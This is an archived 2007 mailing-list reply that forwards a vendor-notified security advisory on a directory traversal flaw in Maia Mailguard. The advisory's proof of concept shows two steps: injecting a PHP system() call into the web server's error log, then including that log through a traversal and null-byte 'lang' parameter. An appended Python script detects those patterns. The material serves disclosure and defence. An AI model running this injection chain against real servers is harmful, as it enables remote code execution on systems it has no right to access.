Re: [AMaViS-user] FW: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]

From: David <df(at)auto123.com>
Date: Fri Jul 06 2007 - 16:45:44 EDT


Jo Rhett wrote:
> How does this relate to amavisd?
>
> On Jul 5, 2007, at 4:18 PM, Michael Scheidell wrote:
>
>
>> didn't see this anywhere, thought you might want to know:
>>
>>
>> --
>> Michael Scheidell, CTO
>> SECNAP Network Security Corporation
>> Keep up to date with latest information on IT security: Real time
>> security alerts:
>> http://www.secnap.com/news
>>
>>
>> -----Original Message-----
>> From: Netragard Security Advisories [mailto:advisories@netragard.com]
>> Sent: Thursday, July 05, 2007 11:19 AM
>> To: vuln@secunia.com; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; vuln@frsirt.com; content@securitydot.net;
>> submissions@packetstormsecurity.org; webmaster@nwc.com;
>> incidents@securityfocus.com
>> Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary
>> Code Execution][NETRAGARD-20070628]
>>
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> *************************** NETRAGARD ADVISORY
>> ************************
>> http://www.netragard.com
>> "We make IT Safe"
>> [Advisory Summary]
>> -
>> ----------------------------------------------------------------------
>> -
>> Advisory Author : Adriel T. Desautels
>> Advisory ID : NETRAGARD-20070628
>> Product Name : Maia Mailguard
>> Product Version : <= 1.0.2 FreeBSD and Possibly More
>> Vendor Name : http://www.miamailguard.com
>> Type of Vulnerability : Directory Traversal / File Read
>> Effort (1-10 where 1 == easy) : 2
>> Impact : Arbitrary Code Execution
>> Vendor Notified : Yes
>> Patch Released : N/A
>> Discovery Date : 06/10/2007
>>
>>
>>
>>
>> [POSTING NOTICE]
>> -
>> ----------------------------------------------------------------------
>> -
>> If you intend to post this advisory on your web-site you must provide a
>> clickable link back to http://www.netragard.com as the contents of this
>> advisory may be updated without notice.
>>
>>
>>
>>
>> [Product Description]
>> -
>> ----------------------------------------------------------------------
>> -
>> "Maia Mailguard is a web-based interface and management system based on
>> the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
>> and PHP, Maia Mailguard gives end-users control over how their mail is
>> processed by virus scanners and spam filters, while giving mail
>> administrators the power to configure site-wide defaults and limits."
>>
>> - -- http://www.miamailguard.com --
>>
>>
>>
>>
>> [Technical Summary]
>> -
>> ----------------------------------------------------------------------
>> -
>> A Directory Traversal vulnerability exists in the Maia Mailguard Web
>> Application that enables an attacker to execute arbitrary commands on
>> the affected system.
>>
>>
>>
>>
>> [Technical Details]
>> -
>> ----------------------------------------------------------------------
>> -
>> Improper input validation on the "lang" variable in Maia Mailguard web
>> application has resulted in a Directory Traversal vulnerability that can
>> be used to execute arbitrary commands on the affected system, or, to read
>> arbitrary files on the affected system.
>>
>>
>>
>>
>> [Proof Of Concept]
>> -
>> ----------------------------------------------------------------------
>> -
>> 1-) An attacker can inject code into the httpd-error.log file by
>> connecting to port 80 on the affected system and issuing a "get
>> <CODE HERE>" command. See example below:
>>
>> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
>> Trying 10.0.0.128...
>> Connected to maiatest.snosoft.com.
>> Escape character is '^]'.
>>
>> get &ltpre>><?php system('ls -laf /var/log');?>
>>
>> HTTP/1.1 400 Bad Request
>> Date: Wed, 20 Jun 2007 21:31:58 GMT
>> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/
>> 2.8.28
>> OpenSSL/0.9.7e-p1
>> Connection: close
>> Content-Type: text/html; charset=iso-8859-1
>>
>> 2-) Once the attacker has injected his code into the log file, the code
>> can be executed by forcing the web application to read the log file.
>> When the log file is read, the code is executed. Below is an example
>> of code execution:
>>
>> the-wretched:~ simon$ wget
>> http://maiatest.snosoft.com/maia/login.php?lang=
>> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>>
>>
>>
>>
>> [Vendor Status]
>> -
>> ----------------------------------------------------------------------
>> -
>> Vendor has been notified and was quick to resolve the issue.
>>
>>
>>
>>
>> [Vendor Comments]
>> -
>> ----------------------------------------------------------------------
>> -
>> "The only addition that I had was that it seems to only affect systems
>> like freebsd... It would be nice to nail that down. I suspect the
>> root security issue is really with the php and file-system
>> interaction... my patch just simply works around and blocks the root
>> problem. From my developer point of view, I'm asking for one file
>> and the file-system is giving us something else. That's a serious
>> risk. If we could at least express that concern, I think that would be
>> prudent.
>>
>> Chicken and egg problem, I was kinda waiting on you to post our own
>> ticket, but.... I can add a comment afterwards. OK. Here's our ticket
>> which also references the changeset:
>>
>> http://www.maiamailguard.org/maia/ticket/479
>>
>> A unified patch may be retrieved from:
>> http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184
>>
>> David Morton"
>>
>>
>>
>>
>> [Disclaimer]
>> -
>> ----------------------http://
>> www.netragard.com-------------------------
>> Netragard, L.L.C. assumes no liability for the use of the information
>> provided in this advisory. This advisory was released in an effort to
>> help the I.T. community protect themselves against a potentially
>> dangerous security hole. This advisory is not an attempt to solicit
>> business.
>>
>> <a href="http://www.netragard.com>
>> http://www.netragard.com
>> </a>
>>
>>
>>
>>
>>
>>
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.5 (Darwin)
>>
>> iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm
>> 4LRwop09S8YjiKDwTSpvgXY=
>> =TeIH
>> -----END PGP SIGNATURE-----
>>
>>
>>
>> *************************** NETRAGARD ADVISORY
>> ************************
>> http://www.netragard.com
>> "We make IT Safe"
>> [Advisory Summary]
>> ----------------------------------------------------------------------
>> -
>> Advisory Author : Adriel T. Desautels
>> Advisory ID : NETRAGARD-20070628
>> Product Name : Maia Mailguard
>> Product Version : <= 1.0.2 (All Platforms)
>> Vendor Name : http://www.miamailguard.com
>> Type of Vulnerability : Directory Traversal / File Read
>> Effort (1-10 where 1 == easy) : 2
>> Impact : Arbitrary Code Execution
>> Vendor Notified : Yes
>> Patch Released : N/A
>> Discovery Date : 06/10/2007
>>
>> [POSTING NOTICE]
>> ----------------------------------------------------------------------
>> -
>> If you intend to post this advisory on your web-site you must provide
>> a clickable link back to http://www.netragard.com as the contents of
>> this advisory may be updated without notice.
>>
>> [Product Description]
>> ----------------------------------------------------------------------
>> -
>> "Maia Mailguard is a web-based interface and management system based on
>> the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
>> and PHP, Maia Mailguard gives end-users control over how their mail is
>> processed by virus scanners and spam filters, while giving mail
>> administrators the power to configure site-wide defaults and limits."
>>
>> -- http://www.miamailguard.com --
>>
>> [Technical Summary]
>> ----------------------------------------------------------------------
>> -
>> A Directory Traversal vulnerability exists in the Maia Mailguard Web
>> Application that enables an attacker to execute arbitrary commands on
>> the affected system.
>>
>> [Technical Details]
>> ----------------------------------------------------------------------
>> -
>> Improper input validation on the "lang" variable in Maia Mailguard web
>> application has resulted in a Directory Traversal vulnerability that
>> can be used to execute arbitrary commands on the affected system, or, to
>> read arbitrary files on the affected system.
>>
>> [Proof Of Concept]
>> ----------------------------------------------------------------------
>> -
>> 1-) An attacker can inject code into the httpd-error.log file by
>> connecting to port 80 on the affected system and issuing a "get
>> <CODE HERE>" command. See example below:
>>
>> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
>> Trying 10.0.0.128...
>> Connected to maiatest.snosoft.com.
>> Escape character is '^]'.
>>
>> get &ltpre>><?php system('ls -laf /var/log');?>
>>
>> HTTP/1.1 400 Bad Request
>> Date: Wed, 20 Jun 2007 21:31:58 GMT
>> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/
>> 2.8.28 OpenSSL/0.9.7e-p1
>> Connection: close
>> Content-Type: text/html; charset=iso-8859-1
>>
>> 2-) Once the attacker has injected his code into the log file, the code
>> can be executed by forcing the web application to read the log file.
>> When the log file is read, the code is executed. Below is an example
>> of code execution:
>>
>> the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/
>> login.php?lang=
>> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>>
>> [Vendor Status]
>> ----------------------------------------------------------------------
>> -
>> Vendor has been notified and has been very quick to respond to and
>> patch this issue.
>>
>> [Vendor Comments]
>> ----------------------------------------------------------------------
>> -
>> "The only addition that I had was that it seems to only affect systems
>> like freebsd... It would be nice to nail that down. I suspect the
>> root security issue is really with the php and filesystem
>> interaction... my patch just simply works around and blocks the root
>> problem. From my developer point of view, I'm asking for one file
>> and the filesystem is giving us something else. That's a serious
>> risk. If we could at least express that concern, I think that would
>> be prudent.
>>
>> Chicken and egg problem, I was kinda waiting on you to post our own
>> ticket, but.... I can add a comment afterwards. OK.
>> Here's our ticket which also references the changeset:
>>
>> http://www.maiamailguard.org/maia/ticket/479
>>
>> A unified patch may be retrieved from:
>> http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184
>>
>> David Morton"
>>
>>
>>
>> [Disclaimer]
>> ----------------------http://
>> www.netragard.com-------------------------
>> Netragard, L.L.C. assumes no liability for the use of the information
>> provided in this advisory. This advisory was released in an effort to
>> help the I.T. community protect themselves against a potentially
>> dangerous security hole. This advisory is not an attempt to solicit
>> business.
>>
>> <a href="http://www.netragard.com>
>> http://www.netragard.com
>> </a>
>>
>>
>>
>>
>>
>>
>>
>> _______________________________________________
>> AMaViS-user mailing list
>> AMaViS-user@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/amavis-user
>> AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3
>> AMaViS-HowTos:http://www.amavis.org/howto/
>>
>
>

A lot of people use Maia Mailguard to control/configure their amavisd-new installations. So it makes sense to post the warning here as a friendly "in case you didn't know". Not everyone subscribes to every mailing list for every product they use. Remember, just because amavisd-new isn't affected directly (or at all in this case) doesn't mean it's not useful to know.



Received on Fri Jul 6 16:45:52 2007

This archive was generated by hypermail 2.1.8 : Fri Jul 06 2007 - 21:24:06 EDT
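
For administrators checking whether the two steps in the quoted proof of concept were tried against their own installation, here is a log check written as an added example; it is not part of the thread, the advisory or Maia Mailguard's code. The log lines are constructed samples, and the pattern for a legitimate `lang` value is an assumption to adjust per deployment.

```python
import re
from urllib.parse import urlsplit, unquote
# Constructed sample log lines (not taken from the advisory).
ACCESS_LOG = [
    '192.0.2.10 - - [20/Jun/2007:21:30:01 +0000] "GET /maia/login.php?lang=en HTTP/1.1" 200 5120',
    '192.0.2.66 - - [20/Jun/2007:21:32:40 +0000] "GET /maia/login.php?lang=../../var/log/httpd-error.log%00.txt HTTP/1.0" 200 9311',
    '192.0.2.66 - - [20/Jun/2007:21:33:02 +0000] "GET /maia/login.php?lang=%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 811',
    '192.0.2.11 - - [20/Jun/2007:21:34:00 +0000] "GET /maia/stats.php?lang=fr HTTP/1.1" 200 2048',
]
ERROR_LOG = [
    "[Wed Jun 20 21:31:58 2007] [error] [client 192.0.2.66] Invalid method in request get <?php /* marker */ ?>",
    "[Wed Jun 20 21:35:10 2007] [error] [client 192.0.2.11] File does not exist: /usr/local/www/favicon.ico",
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*"')
# Assumed shape of a legitimate language code (en, fr, pt_BR); adjust to the deployment.
LANG_OK = re.compile(r"^[A-Za-z]{2,3}(?:[_-][A-Za-z]{2})?$")

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_lang_requests(lines):
    """Return (client, raw_value, reasons) for each lang value that is not a plain language code."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for pair in urlsplit(target).query.split("&"):
            name, _, raw = pair.partition("=")
            if name != "lang":
                continue
            value = fully_decode(raw)
            reasons = [t for t, s in (("traversal", ".."), ("null-byte", "\x00")) if s in value]
            if not reasons and not LANG_OK.match(value):
                reasons.append("not-a-language-code")
            if reasons:
                hits.append((client, raw, reasons))
    return hits

def php_in_error_log(lines):
    """Flag error-log entries containing a PHP open tag, the precondition for the include step."""
    return [line for line in lines if "<?php" in line.lower() or "<?=" in line]
```

A client that appears in both result sets, as 192.0.2.66 does in the sample data, has attempted both halves of the sequence and is the one to investigate first.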

